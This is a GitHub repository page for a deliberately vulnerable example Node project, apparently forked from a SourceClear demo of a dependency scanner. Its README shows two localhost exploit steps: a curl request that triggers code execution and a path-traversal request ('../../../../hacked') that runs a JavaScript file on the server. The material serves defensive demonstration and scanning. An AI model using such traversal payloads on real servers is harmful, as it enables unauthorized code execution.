Skip to content
/ example-javascript-vulnerable-methods Public
forked from veracode/example-javascript-vulnerable-methods

SourceClear’s example node project with vulnerable methods in third party libraries

0 stars 36 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

checkoss/example-javascript-vulnerable-methods

BranchesTags

Repository files navigation

[:] Example node project with vulnerable methods

A node project to demonstrate srcclr agent's vulnerable methods feature for JavaScript

Vulnerability 1 Exploit

git clone https://github.com/srcclr/example-javascript-vulnerable-methods.git
cd example-javascript-vulnerable-methods
npm install
node index.js

and then run the following command in another terminal

curl --path-as-is 'http://127.0.0.1:8001/api/'

You can see the code execution vulnerability are executed mutliple times.

Vulnerability 2 Exploit

git clone https://github.com/srcclr/example-javascript-vulnerable-methods.git
cd example-javascript-vulnerable-methods
npm install
node larvitbase-api.js

and then run the following command in another terminal

curl --path-as-is 'http://127.0.0.1:8001/../../../../hacked'

You can see the JavaScript filehacked.js is executed in the server side.

Scan with SRCCLR Agent

brew tap srcclr/srcclr
brew install srcclr
srcclr activate
srcclr scan --url https://github.com/srcclr/example-javascript-vulnerable-methods

About

SourceClear’s example node project with vulnerable methods in third party libraries

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • JavaScript 100.0%